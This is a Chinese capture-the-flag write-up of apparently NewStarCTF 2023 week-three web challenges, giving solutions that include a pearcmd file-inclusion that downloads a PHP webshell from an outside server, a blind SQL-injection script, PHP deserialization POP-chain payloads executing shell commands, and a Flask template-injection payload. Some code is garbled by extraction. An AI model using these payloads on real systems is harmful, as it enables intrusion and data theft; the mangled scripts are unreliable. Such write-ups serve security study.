解题 5/6
Include 🍐 打开容器,提示phpinfo
进入phpinfo.php查看php配置,发现register_argc_argv配置被打开,index.php内部有一个后缀名为.php的文件包含,通过pearcmd来包含进行恶意文件的下载,在vps上构造恶意文件
1 2 <?php echo '<?php system($_GET[0]);' ;
使用pearcmd包含:?f=pearcmd&+install+-R+/var/www/html+http://ip:port/evil.php
进入tmp/pear/download/evil.php直接命令执行即可。
medium_sql 跟Week2差不多,但是把union的大小写禁用了,用不了联合注入,使用布尔注入
贴个布尔注入脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 import requestsimport string'http://4bbc4bf0-4b86-4dc7-90db-8609acab2c76.node4.buuoj.cn:81/?id=TMP0919\'And if(suBstring((seLect flag from ctf.here_is_flag liMit%201),{},1)=\'{}\',1,0)--+' "_" +"{" +"}" +"-" '' for i in range (1 ,50 ):for j in all_chars:format (i, j)if len (re.text)>450 :print (j,end='' )break print ("Flag: " , flag)
POP Gadget 打开容器,是php反序列化
POP链:Begin->name->__destruct()->Then->func->__toString()->Super->obj->invoke()->Handle->obj->__call->CTF->handle->end()->WhiteGod->__unset()
payload:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 <?php highlight_file (__FILE__ );class Begin public $name ;public function __destruct ( {if (preg_match ("/[a-zA-Z0-9]/" , $this ->name)) {echo "Hello" ;else {echo "Welcome to NewStarCTF 2023!" ;class Then private $func ;public function __construct ( {$this ->func = new Super ;public function __toString ( {$this ->func)();return "Good Job!" ;class Handle protected $obj ;public function __construct ( {$this ->obj = new CTF;public function __call ($func , $vars {$this ->obj->end ();class Super protected $obj ;public function __construct ( {$this ->obj = new Handle ;public function __invoke ( {$this ->obj->getStr ();public function end ( {die ("==GAME OVER==" );class CTF public $handle ;public function __construct ( {$this ->handle = new WhiteGod ;public function end ( {unset ($this ->handle->log);class WhiteGod public $func = 'system' ;public $var = 'cat /flag' ;public function __unset ($var {$this ->func)($this ->var );$a = new Begin ;$a ->name = new Then ;echo urlencode (serialize ($a ));
GenShin 打开容器后发现返回表头pop值为/secr3tofpop
进入后发现是python flask的ssti
黑名单有{{}},os,=等
name={%print({}.__class__.__bases__[0].__subclasses__())%}查看所有方法
使用FileLoader
?name={%print({}.__class__.__bases__[0].__subclasses__()[99][%22get_data%22](0,%22flag%22))%}
得到flag
R!!!C!!!E!!! 打开容器,发现代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 <?php highlight_file (__FILE__ );class minipop public $code ;public $qwejaskdjnlka ;public function __toString ( {if (!preg_match ('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|tee|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i' , $this ->code)){exec ($this ->code);return "alright" ;public function __destruct ( {echo $this ->qwejaskdjnlka;if (isset ($_POST ['payload' ])){unserialize ($_POST ['payload' ]);
过滤的字符有点多,不太容易RCE,最后用了个小技巧,把index.php中的|删去,然后再命令执行。
给出payload:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 <?php highlight_file (__FILE__ );class minipop public $code ;public $qwejaskdjnlka ;public function __toString ( {if (!preg_match ('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|tee|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i' , $this ->code)) {exec ($this ->code);return "alright" ;public function __destruct ( {echo $this ->qwejaskdjnlka;$a = new minipop;$a ->qwejaskdjnlka = new minipop;$a ->qwejaskdjnlka->code = 'sed -i \'s/|//g\' index`echo -e "\x2ep"`hp' ;$a ->qwejaskdjnlka->code = 'ls / >1.php' ;$a ->qwejaskdjnlka->code = 'cat /flag_is_h3eeere >1.php' ;echo (serialize ($a ));
OtenkiGirl 不会,等个官方wp,但凭感觉是原型链污染
总结 第三周感觉难度上来了,做起来有点费劲了
贴个官方wp:https://shimo.im/docs/QPMRxzGktzsZnzhz